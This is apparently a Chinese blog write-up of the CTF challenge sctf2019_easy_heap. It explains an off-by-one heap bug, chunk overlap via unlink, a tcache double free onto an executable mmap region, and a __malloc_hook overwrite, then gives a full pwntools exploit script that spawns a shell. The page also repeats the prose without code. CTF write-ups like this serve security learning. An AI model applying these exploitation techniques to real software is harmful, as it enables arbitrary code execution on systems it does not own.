我的技术与生活——sctf2019_easy_heap

例行检查，保护全开

调用了mmap函数，把0xFFFFFFF000的地址映射到内存中某个地址，并打印出来，很明显这道题得用shellcode来做，这个地址可读可写可运行，后面要用

add函数,会打印出堆的地址

full函数，能输入内容到堆上

最后会增添一个’\x00’,存在off by one 漏洞

free函数，没什么漏洞

先接收mmap映射的地址

p.recvuntil(b'Mmap: ')
vmap = p.recvline().strip()
vmap = int(vmap, 16)
print('vmap=>'+hex(vmap))

做off-by-one这种题的话，有个技巧，一般都是先申请四个堆

add(0x410) #0
add(0x68) #1
add(0x4f0) #2
add(0x68) #3

然后释放第一个，然后填充第一个堆，利用sub_E2D函数的输入把堆2的size位改为0，然后释放堆2进行unlink操作，然后堆1会被夹在中间

1
2
3

free(0)
payload=p64(0)*12+p64(0x490)
fill(1,payload)

释放堆2，会进行unlink

再申请一次0x410和0x68大小的堆，堆2会和堆1的位置重合

再delete几次，相当于double free了堆2

1
2
3

delete(3)
delete(1) #1=>#3 
delete(2) #2(1)=>1

接下来改bin链指针成改成vmap的，写上shellcode

上面的话堆2是没有free的，然后用上面的方式再unlink一次，再add0x410大小的堆，会在堆2的fd指针上有main_arena+96的地址。

fill(1,payload) 

delete(1)

delete(4) #unlink

add(0x410) # 0

fill堆2一个字节，将其改为0x30，既是mallloc_hook的地址

再malloc0x68两次，第二次写上vmap的地址,再任意申请一次堆即可提权

add(0x68) #1
fill(1,p64(vmap)) # 4

add(0x68) #4
fill(4,p64(vmap))
add(0x20)

exp

from pwn import*
from LibcSearcher import *
#p=remote("node4.buuoj.cn",28038)
p=process("./sctf2019_easy_heap")
context.log_level="debug"
libc=ELF('./libc-2.27.so')
context.arch='amd64'
#context=arch('amd64')
def add(size):
    p.sendlineafter('>> ','1')
    p.sendlineafter('Size: ',str(size))

def fill(index,content):
    p.sendlineafter('>> ','3')
    p.sendlineafter('Index:',str(index))
    p.sendlineafter('Content:',content)

def delete(index):
    p.sendlineafter('>> ','2')
    p.sendlineafter('Index: ',str(index))

p.recvuntil(b'Mmap: ')
vmap = p.recvline().strip()
vmap = int(vmap, 16)
print('vmap=>'+hex(vmap))
add(0x410) #0
add(0x68) #1
add(0x4f0) #2
add(0x68) #3

payload=p64(0)*12+p64(0x490)
delete(0)

fill(1,payload)

delete(2)

add(0x410) #0
add(0x68)  #2 lead to chunk1

delete(3)
delete(1) #1=>3
delete(2) #1=>1 in the similar case we use by UAF,but it is not.

add(0x68) #1

fill(1,p64(vmap))
add(0x68) #2
add(0x68) #3

shellcode=asm(shellcraft.sh())
fill(3,shellcode)

add(0x4f0) #4

delete(0) #free 0x410

fill(1,payload) 

delete(1)

delete(4) #unlink

add(0x410) # 0
gdb.attach(p)
sleep(1)
pause()
fill(2,'\x30')

add(0x68) #1
fill(1,p64(vmap)) # 4

add(0x68) #4
fill(4,p64(vmap))
add(0x20)

p.interactive()

站点信息

sctf2019_easy_heap

例行检查，保护全开

调用了mmap函数，把0xFFFFFFF000的地址映射到内存中某个地址，并打印出来，很明显这道题得用shellcode来做，这个地址可读可写可运行，后面要用

add函数,会打印出堆的地址

full函数，能输入内容到堆上

最后会增添一个’\x00’,存在off by one 漏洞

free函数，没什么漏洞

先接收mmap映射的地址

做off-by-one这种题的话，有个技巧，一般都是先申请四个堆

然后释放第一个，然后填充第一个堆，利用sub_E2D函数的输入把堆2的size位改为0，然后释放堆2进行unlink操作，然后堆1会被夹在中间

释放堆2，会进行unlink

再申请一次0x410和0x68大小的堆，堆2会和堆1的位置重合

再delete几次，相当于double free了堆2

接下来改bin链指针成改成vmap的，写上shellcode

上面的话堆2是没有free的，然后用上面的方式再unlink一次，再add0x410大小的堆，会在堆2的fd指针上有main_arena+96的地址。

fill堆2一个字节，将其改为0x30，既是mallloc_hook的地址

再malloc0x68两次，第二次写上vmap的地址,再任意申请一次堆即可提权

exp

评论区

目录

公告栏